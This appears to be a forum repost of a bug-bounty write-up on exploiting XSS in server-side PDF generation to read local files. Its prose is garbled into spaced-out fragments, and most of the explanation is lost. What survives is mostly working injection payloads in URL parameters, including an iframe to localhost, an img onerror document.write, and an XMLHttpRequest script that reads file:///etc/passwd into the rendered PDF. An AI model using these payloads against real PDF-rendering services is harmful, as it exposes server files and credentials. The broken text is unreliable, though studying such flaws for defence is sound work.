搜索

[29041] 2021-06-28_在动态生成的PDF中通过XSS读取本地文件

文档创建者:s7ckTeam
浏览次数:54
最后更新:2025-01-19
2021-06-28_在动态生成的PDF中通过XSS读取本地文件   P D F     X S S   O t s   2 0 2 1 - 0 6 - 2 8 O t s   B u g c r o w d   x y z . c o m P 4   P 1   P D F   u t r n u m b e r   P D F   u t r n u m b e r   H T M L " > < S > a a a   P D F     H T M L     P D F     X S S     P D F   P D F   使   i f r a m e     i f r a m e   f i l e : / / / e t c / p a s s w d     i f r a m e     j a v a s c r i p t     P D F   D O M   M a n i p u l a t i o n j a v a s c r i p t   P D F   a a a a D   J a v a S c r i p t     H T M L     P D F 使   d o c u m e n t . w r i t e ( )   h t t p s : / / x y z . c o m / p a y m e n t s / d o w n l o a d S t a t e m e n t s ? I d = b 9 b c 3 d & u t r n u m b e r = x y z & d a t e = 2 0 1 7 - 0 8 - 1 1 & s e t t l e m e n t _ t y p e = a l l & a d v i c e _ i d = u n d e f i n e d h t t p s : / / x y z . c o m / p a y m e n t s / d o w n l o a d S t a t e m e n t s ? I d = b 9 b c 3 d & u t r n u m b e r = " > < S > a a a   & d a t e = 2 0 1 7 - 0 8 - 1 1 & s e t t l e m e n t _ t y p e = a l l & a d v i c e _ i d = u n d e f i n e d h t t p s : / / x y z . c o m / p a y m e n t s / d o w n l o a d S t a t e m e n t s ? I d = b 9 b c 3 d & u t r n u m b e r = " > < i f r a m e   s r c = " h t t p : / / l o c a l h o s t " > < / i f r a m e > & d a t e = 2 0 1 7 - 0 8 - 1 1 & s e t t l e m e n t _ t y p e = a l l & a d v i c e _ i d = u n d e f i n e d < p   i d = " t e s t " > a a < / p > < s c r i p t >         d o c u m e n t . g e t E l e m e n t B y I d ( ' t e s t ' ) . i n n e r H T M L + = ' a a ' < / s c r i p t >   h t t p s : / / x y z . c o m / p a y m e n t s / d o w n l o a d S t a t e m e n t s ? I d = b 9 b c 3 d & u t r n u m b e r = < p   i d = " t e s t " > a a < / p > < s c r i p t > d o c u m e n t . g e t E l e m e n t B y I d ( ' t e s t ' ) . i n n e r H T M L + = ' a a ' < / s c r i p t > & d a t e = 2 0 1 7 - 0 8 - 1 1 & s e t t l e m e n t _ t y p e = a l l & a d v i c e _ i d = u n d e f i n e d < i m g   s r c = x   o n e r r o r = d o c u m e n t . w r i t e ( " a a a a " ) > h t t p s : / / x y z . c o m / p a y m e n t s / d o w n l o a d S t a t e m e n t s ? I d = b 9 b c 3 d & u t r n u m b e r = < i m g   s r c = x   o n e r r o r = d o c u m e n t . w r i t e ( ' a a a a ' ) > & d a t e = 2 0 1 7 - 0 8 - 1 1 & s e t t l e m e n t _ t y p e = a l l & a d v i c e _ i d = u n d e f i n e d
  j a v a s c r i p t   w i n d o w . l o c a t i o n f i l e : / /   o r i g i n     f i l e : / /     X H R ( X M L H t t p R e q u e s t ) 访 f i l e : / / / e t c / p a s s w d   S a m e - O r g i n - P o l i c y   ; )   X S S     P D F     P D F   h t t p s : / / x y z . c o m / p a y m e n t s / d o w n l o a d S t a t e m e n t s ? I d = b 9 b c 3 d & u t r n u m b e r = < i m g   s r c = x   o n e r r o r = d o c u m e n t . w r i t e ( ' a a a a ' % 2 b w i n d o w . l o c a t i o n ) > & d a t e = 2 0 1 7 - 0 8 - 1 1 & s e t t l e m e n t _ t y p e = a l l & a d v i c e _ i d = u n d e f i n e d < s c r i p t >         x = n e w   X M L H t t p R e q u e s t ;         x . o n l o a d = f u n c t i o n ( ) {             d o c u m e n t . w r i t e ( t h i s . r e s p o n s e T e x t ) } ;         x . o p e n ( " G E T " , " f i l e : / / / e t c / p a s s w d " ) ;         x . s e n d ( ) ; < / s c r i p t > h t t p s : / / x y z . c o m / p a y m e n t s / d o w n l o a d S t a t e m e n t s ? I d = b 9 b c 3 d & u t r n u m b e r = < s c r i p t > x = n e w   X M L H t t p R e q u e s t ; x . o n l o a d = f u n c t i o n ( ) { d o c u m e n t . w r i t e ( t h i s . r e s p o n s e T e x t ) } ; x . o p e n ( " G E T " , " f i l e : / / / e t c / p a s s w d "

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理